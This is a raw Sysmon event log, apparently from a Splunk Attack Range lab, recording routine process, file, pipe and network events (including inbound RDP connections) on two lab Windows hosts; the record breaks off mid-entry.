07:43:02.603{466BC892-02B0-60E8-1600-00000000CF01}130496C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:02.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A65526F1D9CF9A28DA4B095A029729,SHA256=F56CD861043555B3E7C659318EB17B618159C46B358D1B29E054C5675EBD32EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:01.365{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57139-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:02.341{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFD9AB2CB3B6ECE4DA5C72B572BCF32,SHA256=BB3C030E2E39804D8E638FEEF84EFEEFF1175A4C1932EE176340B4C9F204D410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:03.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A1ABAEFFC96A68650E0EA748BDC4A66,SHA256=18CEB06B886F19FFF6002B9955E4843A0B1937668DC1FE480939862B5969C3DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50887-false10.0.1.12-8000- 23542300x80000000000000001045713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:03.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA80ACDA73F1BB5200163FF4D0C07E9,SHA256=802A1F404F17BDBED430FE98FCAE95D520B122A94A05A9389D9917B862AAA15C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:04.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9EF820E3F469768F3F5F9B0FC51E99,SHA256=072E9D1FC614E41D5579AC3DB98D825E5132980AF13FF1D65DC94C76F205FE59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:04.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F4911455D4780CBC61BF69A31A10EB,SHA256=6921AEDED4C677903F2D0730683F77598DA2FCD41E8E7BFB643B125C4EC5C2DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:05.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=181EFCB068DF2EE990C960BC7F25A84C,SHA256=C54B86CA0AD121A3CD6D7647DE90E7B11126353A3044CB8AA2752D884D4BC032,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:05.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77FA90244D5E34C0CE6115DCA83FED1,SHA256=33A6CEF33903C3905E4EE78DDD00F7A6538F245D58344225E86286FDB28B7A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFCEE72B1D6707A6B801A9B489F1177A,SHA256=2BCEF3EA3D26CE27A23453B119B98AA7BE49A25194AC8E60F05E7F8304E7EE47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.435{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0326DE68F3EB6A924DE12AACD5D4E9FD,SHA256=3D55192FFBAB5F799191D4083A4BB7E43DEE0D8688685CDA4859500E03666F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.133{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.086{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001045719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.086{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:43:06.081{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.370.54388881C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:43:06.081{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.370.54388881C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000805861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:06.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:07.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9BF1CAFC86DCAEEF98A1A3A18ED0FFD,SHA256=D1C26CE5FBC669C43EB494BC7BEC2953F1ADEEDE6EF51E6D848B91EF3B82132E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.466{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=238524D53B1D97BDD32CB1A074E485A7,SHA256=79691C30F01AE63CED8F1E733CD72E45268936F0D345A74F190BC2A013D109EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:08.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E809DA9EA6BCA39BC1FCD7624F629167,SHA256=E8BF3FCC5C9A1C103ED70E9A626182F39891160809A9C3A73474FA5D07E1AFCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:08.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C978DC6F8B6784C0390C85A044679A67,SHA256=E73F0415B8494775B93AB19D3AFAED75BFB9BC298A9B9C54403DA3562527554B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:09.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E7A6930EB11D2792C91AFB4D1EE1EA,SHA256=DA42CAE428C5AA385A17AAB71066F673BF67E3D3C7D00F0F3EEC8422F7977BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:09.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49F9AA072C9EE48BA09C919F8E31366,SHA256=8C387CC38AC323072CBED48F1B5185B7E8BC7AF5FBBA3E182889DED92BB66AC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.302{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57140-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000805865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:07.185{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com63375-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001045727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:10.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0B8FD60B6BCEFFAF17AED13BCDF50D4,SHA256=6A18DC49B1E50962E719A6DB06E63856EAF4167A873C39BD2ED4641F1438CA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:10.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B7B8D640E158B62F7265FCEF6E4345,SHA256=C49D6DE7C1BD1F709AD6EA4E0D2B396306FBEEBBFEEBDB839C78130B4FBBABE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:01.636{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50888-false10.0.1.12-8000- 23542300x80000000000000001045728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:11.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01DDE23B9D84E22FB786A16D8C26DFD7,SHA256=549B80970BF525A46AD7A5BF2C2E2C8F55C8CBE06C51D780E71DA1669A94A6D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.576{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB34E3B0AF74F6CD867784F33D6BC70,SHA256=56D4346BD009447084396E1EF777B296280103CC950812D817600CF68438A907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:12.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B501697F5CBF24A3BBEEB99B2997AA1B,SHA256=59042F70EC4A6102DBEF9329744ECD83DE627AE3195444312093922BCD9D1742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.669{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74DB58B5B5441FA4F1013BA72D16252C,SHA256=BF711EA8112F468C361C3C213DF6FB6DA5F9CA36F52818403892FBFA2B407EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.669{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA8CF747067E94A6B097C93CA19E1E5C,SHA256=6E22D24792C6B9B569991FAD5BA972BEE28234EF787AFB9A96141A02738644E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:12.591{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8231541C5F16D8AE9A9BF1F77466D81E,SHA256=589EFAAD2C5B832ECB1DEE6B91C256341CAE9376310FCA89E8325083AD7B7566,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:05.209{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57141-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:13.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FE4BB5530409A42C9F427EECEDB58B1,SHA256=D2DB92C2BB8BD7E61BC3E506410E223EF1FD19B43ECF7E012929D2F45B7CBDC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:13.654{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B9B93FF00BCA284522C749F6707D89,SHA256=D08B04CC41A92BB78C497615E8716E413426D275AC5E2A9E0BEF2FABAED25050,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.500{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-31339-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001045733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:06.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50889-false10.0.1.12-8000- 23542300x80000000000000001045732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:14.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A00F87CAA22CA7ADF3814AA6DB03E78,SHA256=DD30A428C3E08A319AC9C27BBAB89065DD4B2D2FB4F56816252B3BFB29C294A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:14.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F845B4869AD6BB7B27864994FBAB57CF,SHA256=0D230F36D5CF05C79A70D04171B8B180DCE490239ABBCEEF74883807C481DA94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.804{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57141-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001045738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 